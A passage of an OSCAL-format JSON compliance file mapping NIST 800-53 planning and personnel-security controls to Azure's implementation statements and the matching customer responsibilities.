related activities to ensure they do not adversely affect operations. Key operating personnel from each service team assist with change control board and policy reviews that relate to security activities. Individuals assigned to these roles understand the significance of the ongoing security and privacy related activities (security assessments, audits, system hardware and software maintenance, vulnerability scanning and patching, security certifications, and testing exercises), the potential impact on the system, and the necessary support for such activities. If activities involve Azure fundamental services, those teams are included in planning as well. Azure has a formal technology strategy that is maintained and updated annually to align the strategy with business goals and objectives. Azure plans and coordinates security and privacy related activities such as application and infrastructure upgrades, security audits and testing, and continuity planning exercises affecting the information system with C+AI Security management before conducting such activities in order to reduce the impact on organizational operations, organizational assets, individuals, and Azure customers."}],"responsibilities":[{"uuid":"f5bc6c4f-3df2-48eb-9fa1-b0c49bc12f96","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-006"}],"description":"The customer is responsible for developing a system security plan (SSP) that meets the criteria defined by the target authorization. Customers may reference NIST Special Publication 800-18 Revision 1, Guide for Developing Security Plans for Federal Information Systems. The customer SSP should address controls inherited from Azure and refer to the Azure SSP for implementation details.","provided-uuid":"8b1624a5-4db4-4c54-acfc-84c752dfaec0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"7b79c7a7-ef74-49c8-9a80-5df1f18c4fcb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-2_smt.b","by-components":[{"uuid":"9a1b98e6-5fbf-4ec6-96ec-6f98dd96eec7","export":{"provided":[{"uuid":"62792c63-877f-4448-a513-79d8071b522d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-007"}],"description":"The Azure System Security Plan is posted on the internal Azure SharePoint and distributed to the Azure ISSO and Azure Program Managers."}],"responsibilities":[{"uuid":"d172292f-0828-44e8-8101-d4c566ef1a68","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-007"}],"description":"The customer is responsible for distributing the system security plan.","provided-uuid":"62792c63-877f-4448-a513-79d8071b522d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"370d690a-a409-4616-bba7-6c84c44f0db3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-008"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-2_smt.c","by-components":[{"uuid":"21043baa-5a7a-4c11-bd09-65480c465265","export":{"provided":[{"uuid":"88dbfef3-b72c-4f68-881e-9176c7795d30","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-008"}],"description":"Microsoft works with service teams to review the Azure System Security Plan on an annual basis or when there is a major change to the system at a minimum. Microsoft coordinates these reviews to address changes to the Azure security implementations or problems identified during plan implementation or security control assessments. In addition to the formal update process, the Azure Compliance team regularly updates the SSP with internal and external customer feedback, process updates, and service improvements."}],"responsibilities":[{"uuid":"b1c932d4-dd8b-459b-93f2-6f1f4c33ee2d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-008"}],"description":"The customer is responsible for reviewing the system security plan.","provided-uuid":"88dbfef3-b72c-4f68-881e-9176c7795d30"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"8e7f7bc4-b2f8-4c22-8463-2fa49beaadb4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-009"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-2_smt.d","by-components":[{"uuid":"a48c97fe-dc04-4218-bae2-8f67d598210a","export":{"provided":[{"uuid":"daa37497-52b1-4994-a983-a7c1f0540c51","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-009"}],"description":"Microsoft makes updates to the Azure System Security Plan as service teams make changes to the Azure security implementations or the Azure environment to ensure the plan represents an accurate depiction of the Azure security posture. Microsoft coordinates and updates the plan to address changes to the Azure cloud or the network or problems identified during plan implementation or security control assessments. Microsoft formally updates the Azure SSP annually via submission to the regulator. This regulator submission includes upload and maintenance of any regulator Assessment and Authorization (A&A) tooling, including eMASS, Xacta, RSA Archer, CSAM, and more. In addition to the formal update process, the Azure Compliance team regularly updates the SSP with internal and external customer feedback, process updates, and service improvements."}],"responsibilities":[{"uuid":"ce662e3b-b15f-47ee-ba5f-85b214fed8aa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-009"}],"description":"The customer is responsible for updating the system security plan.","provided-uuid":"daa37497-52b1-4994-a983-a7c1f0540c51"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"811a7cd4-1fde-486a-a03a-fe46ddaf05d4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-2_smt.e","by-components":[{"uuid":"8327c9f3-06d5-48b5-8cfb-023d86b2dc9f","export":{"provided":[{"uuid":"caba32ad-4751-4db1-b396-efdb7d2a03bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-010"}],"description":"The System Security Plan is posted on the internal Azure SharePoint and protected using SharePoint's built-in confidentiality and integrity protection mechanisms. This SharePoint is used for dissemination only to Azure personnel and relevant external parties."}],"responsibilities":[{"uuid":"74da663e-97c4-4a5d-a437-614ad811fb22","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-010"}],"description":"The customer is responsible for protecting the system security plan.","provided-uuid":"caba32ad-4751-4db1-b396-efdb7d2a03bc"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7786ada8-b4d4-4b40-aa9b-c33a69bcfd67","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"pl-4","statements":[{"uuid":"dcf5710b-72c6-4054-82f8-820a71d4bdaa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-011"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-4_smt.a","by-components":[{"uuid":"fc9519e1-4eae-4f83-abbd-75f95d4da725","export":{"provided":[{"uuid":"a2f7df9d-264f-4099-b0ff-3938e56dac42","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-011"}],"description":"Microsoft establishes and makes readily available to all Microsoft personnel the Microsoft Acceptable Use Standard which describes Microsoft internal user responsibilities and outlines the Online Services specific acceptable usage standards of the Infrastructure and Services technology assets. The agreements are put in place to protect trade secrets, sensitive, or business confidential information and assets. Additionally, the Microsoft Security Program Policy (MSPP) describes Microsoft user responsibilities and establishes expected behavior when using Azure and other Microsoft services. All Microsoft personnel, including FTEs, vendors, and contingent staff are required to follow the rules of behavior, which are outlined in the Microsoft Security Program Policy (MSPP) that describes user responsibilities and establishes expected behavior when using Azure and Microsoft services. The Employee Agreement, the new hire orientation process, and the Microsoft Security Policy (MSP) include statements regarding information and asset protection responsibilities. They also describe the penalties for the violation of these responsibilities. Also communicated via training, Microsoft Services' security responsibilities extend outside of the work site, beyond the standard operating hours of their employment, and these responsibilities continue for a defined period after employment ends. All Azure personnel are required to sign and Employee Agreement, as well as other paperwork acknowledging training provided in the new hire orientation process, as a condition for employment. All Azure personnel must provide a signed confirmation indicating understanding and agreement of these expectations prior to gaining access to the Microsoft's network. The annual fulfillment of the Security Foundations Training is signed by all personnel and meets the requirements for the rules of behavior and access agreements. At the end of the Security Foundations Training, the personnel must check a box acknowledging that they have access to the Microsoft Policy and will abide by those policies. All personnel also must take the Standards of Business Conduct (SBC) training, which includes additional information on responsibilities."}],"responsibilities":[{"uuid":"6ceda1aa-e8d7-4e62-834c-5148f8e01c5a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-011"}],"description":"The customer is responsible for establishing rules of behavior.","provided-uuid":"a2f7df9d-264f-4099-b0ff-3938e56dac42"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"27c9b611-1a6d-491f-aaa4-33ebef29591b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-012"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-4_smt.b","by-components":[{"uuid":"bc22ac8c-c88d-47db-b33a-0756c8c4f2f1","export":{"provided":[{"uuid":"5efd51de-9c95-4f59-963a-40b3cc26a184","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-012"}],"description":"In accordance with the Microsoft Security Policy, Microsoft requires signed acknowledgment from personnel indicating that they have read, understand, and agree to abide by user requirements before gaining authorized access to Azure. All Azure personnel are required to sign an Employee Agreement with non-disclosure provisions, as well as acknowledging security training provided in the new hire orientation process, at the time of hiring as a condition for employment. This signature acknowledges the terms and conditions of their role and their understanding and acceptance of the Microsoft corporate policies (including the Microsoft Security Program Policy (MSPP)). Contingent staff members (vendors and subcontractors) are required to sign and acknowledge the Microsoft Resource Access Agreement prior to being granted access to Microsoft information and services. Additionally, contingent staff members inherit the responsibilities based on the agreement between Microsoft and their respective organizations as detailed in respective contracts. All Azure personnel are also required to sign an Employee Agreement."}],"responsibilities":[{"uuid":"4ff42f42-002c-486d-bcd1-b1845fc7103b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-012"}],"description":"The customer is responsible for obtaining signed acknowledgment of the rules of behavior from system users.","provided-uuid":"5efd51de-9c95-4f59-963a-40b3cc26a184"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"946d7649-9650-42a0-8df1-ec33fe89f732","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-013"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-4_smt.c","by-components":[{"uuid":"ee60bf96-b2c3-4973-92ca-4b988894f0af","export":{"provided":[{"uuid":"7d0e2cbb-1e6e-4b76-8676-4bf8546adae9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-013"}],"description":"Microsoft reviews the Non-Disclosure Agreement, the Microsoft Security Policy and other contractual paperwork signed during the new hire orientation process at least annually. If changes are needed, Microsoft updates the paperwork during the annual review. The paperwork is updated in an annual basis. On an annual basis, Microsoft employees are required to review the rules of behavior through the annual Security Foundations training. Personnel signature is evidenced through the successful completion of the security training which requires in-course attestation. The security training which includes the rules of behavior is updated annually."}],"responsibilities":[{"uuid":"d8030e68-0adf-4a1e-81f2-0db6ada60cde","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-013"}],"description":"The customer is responsible for reviewing and updating the rules of behavior.","provided-uuid":"7d0e2cbb-1e6e-4b76-8676-4bf8546adae9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"965a2a65-496f-4380-b17c-a01587754766","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-014"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-4_smt.d","by-components":[{"uuid":"b9ede9ef-a4e6-4299-8daf-572a745afc8c","export":{"provided":[{"uuid":"c0b506c8-6526-45d4-b5ff-a990f33239b4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-014"}],"description":"After revisions, the revised document is included in annual security awareness training, which all personnel must take and sign upon completion."}],"responsibilities":[{"uuid":"b7ecd00c-843f-4915-99c5-473ed2c39e39","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-014"}],"description":"The customer is responsible for obtaining signed acknowledgment of the updated rules of behavior from system users.","provided-uuid":"c0b506c8-6526-45d4-b5ff-a990f33239b4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"375bd75e-e03b-4ca7-9742-e6d6ebdb1b68","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"pl-4.1","statements":[{"uuid":"0c9092aa-4dd9-4759-9575-e86aaa5a6e09","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-015"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-4.1_smt","by-components":[{"uuid":"fd27e1a1-3848-4f75-87a1-52630bd4ddd0","export":{"provided":[{"uuid":"cf50f7a3-d3ca-41e6-b9f1-bb5fc1244635","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-015"}],"description":"The Microsoft security awareness training includes explicit restrictions on the use of social media/networking sites and posting organizational information on public websites, and is also included in training provided during the new hire orientation process._x000D_ _x000D_"}],"responsibilities":[{"uuid":"cf985138-025c-426a-86b9-a0aa307e13a6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-015"}],"description":"The customer is responsible for including restrictions on the use of social media/networking sites and posting organizational information on public websites in the rules of behavior.","provided-uuid":"cf50f7a3-d3ca-41e6-b9f1-bb5fc1244635"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c066e4c5-3476-47eb-90c5-f581303fe51c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"pl-8","statements":[{"uuid":"86107c90-2c27-4c77-918c-3266b145890c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-016"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-8_smt.a","by-components":[{"uuid":"53787454-72a1-4d39-a8ea-be6642ba486b","export":{"provided":[{"uuid":"d6a0f1b3-a106-4f2c-b020-d878553e6057","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-016"}],"description":"Azure's security and privacy architecture describes: * The overall philosophy, requirements, and approach to be taken with regard to protecting the confidentiality, integrity, and availability of data relevant to and stored within Azure * Standards in place to process personally identifiable information to minimize privacy risk * The integration of Azure architecture into Azure's Infrastructure architecture * Assumptions about and dependencies on external services Guidance for the development of the information system architecture for Azure is included in the Microsoft Security Program Policy (MSPP), MSP-08 Operations Security. Documented Operating Procedures, Service Architecture, and Threat Modeling Operating procedures for services providing Microsoft's services must also be formally documented, approved, and communicated and should contain, at a minimum, those processes that impact the confidentiality, integrity, or availability of a system and critical data. Service architecture must be documented and threat modeling is performed to identify security threats to the service and ensure adequate mitigations are in place. System operations staff must develop Security configuration baseline for services and ensure that services are implemented according to approved security configuration baseline. Antivirus and Anti-Malware Protection All Microsoft services must be protected from malicious software and hardware. Microsoft personnel are made aware of the potential dangers resulting from circumvention of network controls, such as downloading files from unknown or untrusted sources or providing inappropriate access. Security incidents that occur must be logged, verified, retained, secured, and appropriate corrective actions must be taken in response to these events. Security Logging, Monitoring, and Reporting System operations staff must implement monitoring technology and/or procedures to ensure timely detection and response to security incidents. Audit logs must be examined in a timely manner, and all identified anomalies must be investigated for possible misuse or compromise. Any log event which indicates a potential violation of Microsoft's Security Policy must be brought to the attention of the respective organization's appropriate service team. System operations staff ensure key services must have appropriate logging enabled and securely transmit logs to a central collection point. Logs must be maintained for a specified period of time according to standards. Monitoring and reporting tools must be available and used to assess the security posture of Microsoft. Change Control and Acceptance An operational change control procedure must be in place for each operational service team within Microsoft. These procedures must include a process for organizational management review and approval. These change control procedures must be communicated to all parties (Microsoft and third parties) who perform system maintenance on or in any of Microsoft's facilities. Acceptance criteria must be established by each security organization for new services, upgrades to existing services, and changes to processes to ensure services meet this security policy and any associated procedures and standards. Security Vulnerabilities and Penetration Testing To help prevent the risk of exposure to known security vulnerabilities, it is the responsibility of each Asset Owner to ensure their services have the latest security related patches. Systems operations staff must proactively monitor the service assets for possible exposures. This monitoring must include scanning for known system vulnerabilities and penetration testing from outside as well as inside Microsoft's environment. These activities must be scheduled and conducted in such a fashion as to minimize impact to the environment or organization. The frequency of scanning and penetration testing is determined by the sensitivity and criticality of the system."}],"responsibilities":[{"uuid":"4f8d356a-7100-45f1-88ec-1e1245b56e2e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-016"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for developing an information security and privacy architecture for customer-deployed resources.","provided-uuid":"d6a0f1b3-a106-4f2c-b020-d878553e6057"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"e828ff7d-dffe-4fb8-8368-b91403ab1a23","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-017"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-8_smt.b","by-components":[{"uuid":"c07333bd-4e46-40e9-9207-a5c4ae71164a","export":{"provided":[{"uuid":"7325864b-0121-43f3-9c00-5e703faef407","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-017"}],"description":"Azure reviews and updates the information security architecture annually and when significant changes are made to Azure architecture or changes are made within the Microsoft Security Program Policy (MSPP)."}],"responsibilities":[{"uuid":"25133da1-ba7f-49f6-9182-b945c00439b2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-017"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing and updating the information security architecture.","provided-uuid":"7325864b-0121-43f3-9c00-5e703faef407"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"85592790-72a1-4745-af4c-7e4484d9949d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-018"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-8_smt.c","by-components":[{"uuid":"845121b9-bfab-4ad4-bc6b-1b8f085e72c2","export":{"provided":[{"uuid":"532db113-c11a-4107-a0cb-cb9e7f404988","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-018"}],"description":"Azure updates this System Security Plan and all Azure procurement/acquisition procedures annually or whenever the information security architecture changes."}],"responsibilities":[{"uuid":"3aeae3a7-22de-4b4e-942d-cd9ffb6e080c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-018"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for accounting for planned changes to the information security architecture.","provided-uuid":"532db113-c11a-4107-a0cb-cb9e7f404988"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ea9f212f-e4ab-485a-b99f-9f7f9e253927","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"pl-10","statements":[{"uuid":"fa98cc7e-4f46-4efe-bcde-1c3ba863f7c1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-019"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-10_smt","by-components":[{"uuid":"ed1f4fbe-e911-4f5d-a196-372c3675f20d","export":{"provided":[{"uuid":"0965e5e8-6aee-4027-ab80-e7a97ffc98e3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-019"}],"description":"Azure implements NIST 800-53 rev 5 security control baselines that have been selected by FedRAMP Program Management Office (PMO) to support FedRAMP High compliance requirements and by United States DoD regulators to support DoD SRG compliance requirements. . Azure employs an approved Third-Party Assessment Organization (3PAO) as an independent assessor to conduct a security control assessment of Azure in accordance with security control requirements. The results of this assessment and related activities are submitted to Azure's authorizing officials."}],"responsibilities":[{"uuid":"f983ec06-f49b-4214-a222-f02b47a2204e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-019"}],"description":"The customer is responsible for selecting control baseline for customer-deployed resources.","provided-uuid":"0965e5e8-6aee-4027-ab80-e7a97ffc98e3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1fd5556b-9a6e-496b-b869-039fe2cc4812","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"pl-11","statements":[{"uuid":"721d16a1-a300-4a44-9529-a42dc04b5fe1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-11_smt","by-components":[{"uuid":"fa28020f-a1db-43b4-98c1-d95d15a52918","export":{"provided":[{"uuid":"ad2b333f-5746-4708-8c60-5ca3cef4234b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-020"}],"description":"Azure implements NIST 800-53 rev 5 security control baselines that have been selected by FedRAMP Program Management Office (PMO) to support FedRAMP High compliance requirements and by United States DoD regulators to support DoD SRG compliance requirements. . Azure designs and tailors processes around the security controls where sprit of the controls are addressed by taking mitigation actions on identified risks. Azure employs an approved Third-Party Assessment Organization (3PAO) as an independent assessor to conduct a security control assessment of Azure in accordance with security control requirements. The results of this assessment and related activities are submitted to Azure's authorizing officials."}],"responsibilities":[{"uuid":"61d90e73-600f-4bda-b3ec-be32b3efb9b2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-020"}],"description":"The customer is responsible for tailoring selected control baseline by applying specified tailoring actions for customer-deployed systems.","provided-uuid":"ad2b333f-5746-4708-8c60-5ca3cef4234b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8534e15b-73b5-45de-a88e-cd1ce069191d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-2","statements":[{"uuid":"fec7c421-cacf-444f-830f-76f2453e11d7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-006"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-2_smt.a","by-components":[{"uuid":"6eb36226-e338-4c90-b8a4-aafe3b7976bf","export":{"provided":[{"uuid":"baed1598-790e-4b0b-a946-11f8df2e8fd9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-006"}],"description":"Microsoft ensures that all Azure personnel including subcontractors have risk designations in place based on role assignments. The risk designation is based on the asset classification assigned to information accessed, including federal customer data. Asset classification is determined through the types of information the asset contains._x000D_ _x000D_"}],"responsibilities":[{"uuid":"7fba2349-6b71-49b6-808b-a2d734035a3f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-006"}],"description":"The customer is responsible for assigning risk designations to positions.","provided-uuid":"baed1598-790e-4b0b-a946-11f8df2e8fd9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c530179c-34ec-48c2-8cc3-b52130271661","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-007"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-2_smt.b","by-components":[{"uuid":"c40ee184-c186-4889-bbcf-9eabf66dcbaa","export":{"provided":[{"uuid":"084dd0a4-244f-45d9-9468-99c4441a27d4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-007"}],"description":"Azure, in coordination with Microsoft Human Resources (HR), establishes screening criteria for Azure service team personnel by reviewing positions for risk as well as considering customer expectations. All personnel require the Microsoft Cloud Screen._x000D_ _x000D_"}],"responsibilities":[{"uuid":"5a80bb5e-6073-427f-b68f-ae0a40c39615","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-007"}],"description":"The customer is responsible for establishing screening criteria to screen individuals filling the positions identified in PS-02.a.","provided-uuid":"084dd0a4-244f-45d9-9468-99c4441a27d4"}]},"description":"See inheritance and customer responsibility 